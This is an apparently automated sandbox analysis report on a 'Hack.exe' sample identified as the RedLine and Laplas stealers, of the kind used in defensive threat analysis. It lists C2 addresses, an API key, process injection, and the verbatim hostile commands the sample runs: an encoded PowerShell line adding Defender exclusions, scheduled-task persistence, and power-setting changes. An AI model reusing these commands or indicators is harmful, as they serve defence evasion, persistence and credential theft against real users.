Analysis
max time kernel: 41s
max time network: 138s
platform: windows10-1703_x64
resource: win10-20230703-en
resource tags: arch:x64, arch:x86, image:win10-20230703-en, locale:en-us, os:windows10-1703-x64, system
submitted: 30-07-2023 21:52
Static task: static1
Behavioral task: behavioral1
Sample: Setup Hack/Hack.exe
Resource: win7-20230712-en
Behavioral task: behavioral2
Sample: Setup Hack/Hack.exe
Resource: win10-20230703-en
Behavioral task: behavioral3
Sample: Setup Hack/Hack.exe
Resource: win10v2004-20230703-en
General
Target: Setup Hack/Hack.exe
Size: 2.4MB
MD5: a72a98d3af3f7afeb0859746621cbb96
SHA1: 46bd27a8881f46432aed56096532099f531fda07
SHA256: 25f2b8249f473ecbbdce0c8251584193a264d65a2e66cf2d436d6cc998131de7
SHA512: 4111f8820d8d001c6e04433aaa790dde32b49899b2a55f0b26eefbde87e19ecd49f18d86b464d800c7e9780236b1dfc5a3ee6a828ee468bdb6f0433c7f2e8db8
SSDEEP: 24576:752A3xTrSOlk1yk1g6YmBeJ5D5BtndadNK:/xTrSO+K6pBe4K
Malware Config
Extracted: redline
@Turbin63
94.142.138.4:80
auth_value: c9d51c45ece76628902c971fd5a55a1c
Extracted: laplas
http://185.209.161.189
api_key: f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
pid  | Process
4716 | svchost.exe
1100 | conhost.exe
764  | 7z.exe
2932 | 7z.exe
236  | 7z.exe
992  | 4.exe
5000 | ntlhost.exe
-
Loads dropped DLL 3 IoCs
pid  | Process
764  | 7z.exe
2932 | 7z.exe
236  | 7z.exe
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description     | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1148472871-1113856141-1322182616-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" | svchost.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description                           | pid  | Process  | procid_target
PID 1164 set thread context of 4556   | 1164 | Hack.exe | 71
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid  | pid_target | Process      | procid_target
2344 | 1164       | WerFault.exe | 69
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description            | flow | ioc
HTTP User-Agent header | 25   | Go-http-client/1.1
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid  | Process
4556 | AppLaunch.exe
4556 | AppLaunch.exe
992  | 4.exe
3280 | powershell.exe
3280 | powershell.exe
3280 | powershell.exe
992  | 4.exe
992  | 4.exe
992  | 4.exe
992  | 4.exe
992  | 4.exe
992  | 4.exe
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
description                 | pid  | Process
Token: SeDebugPrivilege     | 4556 | AppLaunch.exe
Token: SeRestorePrivilege   | 764  | 7z.exe
Token: 35                   | 764  | 7z.exe
Token: SeSecurityPrivilege  | 764  | 7z.exe
Token: SeSecurityPrivilege  | 764  | 7z.exe
Token: SeRestorePrivilege   | 2932 | 7z.exe
Token: 35                   | 2932 | 7z.exe
Token: SeSecurityPrivilege  | 2932 | 7z.exe
Token: SeSecurityPrivilege  | 2932 | 7z.exe
Token: SeRestorePrivilege   | 236  | 7z.exe
Token: 35                   | 236  | 7z.exe
Token: SeSecurityPrivilege  | 236  | 7z.exe
Token: SeSecurityPrivilege  | 236  | 7z.exe
Token: SeDebugPrivilege     | 992  | 4.exe
Token: SeDebugPrivilege     | 3280 | powershell.exe
-
Suspicious use of WriteProcessMemory 39 IoCs
description                         | pid  | Process       | procid_target
PID 1164 wrote to memory of 4556    | 1164 | Hack.exe      | 71
PID 1164 wrote to memory of 4556    | 1164 | Hack.exe      | 71
PID 1164 wrote to memory of 4556    | 1164 | Hack.exe      | 71
PID 1164 wrote to memory of 4556    | 1164 | Hack.exe      | 71
PID 1164 wrote to memory of 4556    | 1164 | Hack.exe      | 71
PID 4556 wrote to memory of 4716    | 4556 | AppLaunch.exe | 75
PID 4556 wrote to memory of 4716    | 4556 | AppLaunch.exe | 75
PID 4556 wrote to memory of 1100    | 4556 | AppLaunch.exe | 76
PID 4556 wrote to memory of 1100    | 4556 | AppLaunch.exe | 76
PID 4556 wrote to memory of 1100    | 4556 | AppLaunch.exe | 76
PID 1100 wrote to memory of 4144    | 1100 | conhost.exe   | 77
PID 1100 wrote to memory of 4144    | 1100 | conhost.exe   | 77
PID 4144 wrote to memory of 920     | 4144 | cmd.exe       | 79
PID 4144 wrote to memory of 920     | 4144 | cmd.exe       | 79
PID 4144 wrote to memory of 764     | 4144 | cmd.exe       | 80
PID 4144 wrote to memory of 764     | 4144 | cmd.exe       | 80
PID 4144 wrote to memory of 2932    | 4144 | cmd.exe       | 81
PID 4144 wrote to memory of 2932    | 4144 | cmd.exe       | 81
PID 4144 wrote to memory of 236     | 4144 | cmd.exe       | 82
PID 4144 wrote to memory of 236     | 4144 | cmd.exe       | 82
PID 4144 wrote to memory of 4900    | 4144 | cmd.exe       | 84
PID 4144 wrote to memory of 4900    | 4144 | cmd.exe       | 84
PID 4144 wrote to memory of 992     | 4144 | cmd.exe       | 83
PID 4144 wrote to memory of 992     | 4144 | cmd.exe       | 83
PID 4144 wrote to memory of 992     | 4144 | cmd.exe       | 83
PID 992 wrote to memory of 2936     | 992  | 4.exe         | 85
PID 992 wrote to memory of 2936     | 992  | 4.exe         | 85
PID 992 wrote to memory of 2936     | 992  | 4.exe         | 85
PID 2936 wrote to memory of 3280    | 2936 | cmd.exe       | 87
PID 2936 wrote to memory of 3280    | 2936 | cmd.exe       | 87
PID 2936 wrote to memory of 3280    | 2936 | cmd.exe       | 87
PID 992 wrote to memory of 600      | 992  | 4.exe         | 90
PID 992 wrote to memory of 600      | 992  | 4.exe         | 90
PID 992 wrote to memory of 600      | 992  | 4.exe         | 90
PID 992 wrote to memory of 3868     | 992  | 4.exe         | 89
PID 992 wrote to memory of 3868     | 992  | 4.exe         | 89
PID 992 wrote to memory of 3868     | 992  | 4.exe         | 89
PID 4716 wrote to memory of 5000    | 4716 | svchost.exe   | 88
PID 4716 wrote to memory of 5000    | 4716 | svchost.exe   | 88
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid  | Process
4900 | attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup Hack\Hack.exe (depth 1)
  command line: "C:\Users\Admin\AppData\Local\Temp\Setup Hack\Hack.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1164
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe (depth 2)
    command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4556
    C:\Users\Admin\AppData\Local\Temp\svchost.exe (depth 3)
      command line: "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory
      PID:4716
      C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe (depth 4)
        command line: C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
        - Executes dropped EXE
        PID:5000
    C:\Users\Admin\AppData\Local\Temp\conhost.exe (depth 3)
      command line: "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID:1100
      C:\Windows\system32\cmd.exe (depth 4)
        command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
        - Suspicious use of WriteProcessMemory
        PID:4144
        C:\Windows\system32\mode.com (depth 5)
          command line: mode 65,10
          PID:920
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe (depth 5)
          command line: 7z.exe e file.zip -p151971033210090161381766327410 -oextracted
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of AdjustPrivilegeToken
          PID:764
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe (depth 5)
          command line: 7z.exe e extracted/file_2.zip -oextracted
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of AdjustPrivilegeToken
          PID:2932
        C:\Users\Admin\AppData\Local\Temp\main\7z.exe (depth 5)
          command line: 7z.exe e extracted/file_1.zip -oextracted
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of AdjustPrivilegeToken
          PID:236
        C:\Users\Admin\AppData\Local\Temp\main\4.exe (depth 5)
          command line: "4.exe"
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID:992
          C:\Windows\SysWOW64\cmd.exe (depth 6)
            command line: "cmd.exe" /C powershell -EncodedCommand "PAAjADYAVAA1AHYAZABmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQgB1AHUAQgA5AGkAbgBOADkAaABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG8ARwBZAE8ASwBxAHMASwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBlADIANwBmAGEAMgBMADUATgBsAHgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
            - Suspicious use of WriteProcessMemory
            PID:2936
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
              command line: powershell -EncodedCommand "PAAjADYAVAA1AHYAZABmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQgB1AHUAQgA5AGkAbgBOADkAaABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG8ARwBZAE8ASwBxAHMASwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBlADIANwBmAGEAMgBMADUATgBsAHgAIwA+AA=="
              (the UTF-16LE base64 decodes to: <#6T5vdf#> Add-MpPreference <#BuuB9inN9he#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#oGYOKqsK#> -Force <#e27fa2L5Nlx#>; the <# ... #> comment blocks are filler, and the effect is a Defender exclusion for the whole user profile and system drive)
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              PID:3280
          C:\Windows\SysWOW64\cmd.exe (depth 6)
            command line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1344" /TR "C:\ProgramData\Dllhost\dllhost.exe"
            PID:3868
          C:\Windows\SysWOW64\cmd.exe (depth 6)
            command line: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
            PID:600
        C:\Windows\system32\attrib.exe (depth 5)
          command line: attrib +H "4.exe"
          - Views/modifies file attributes
          PID:4900
  C:\Windows\SysWOW64\WerFault.exe (depth 2)
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1164 -s 324
    - Program crash
    PID:2344
-
Network
MITRE ATT&CK Enterprise v15
Downloads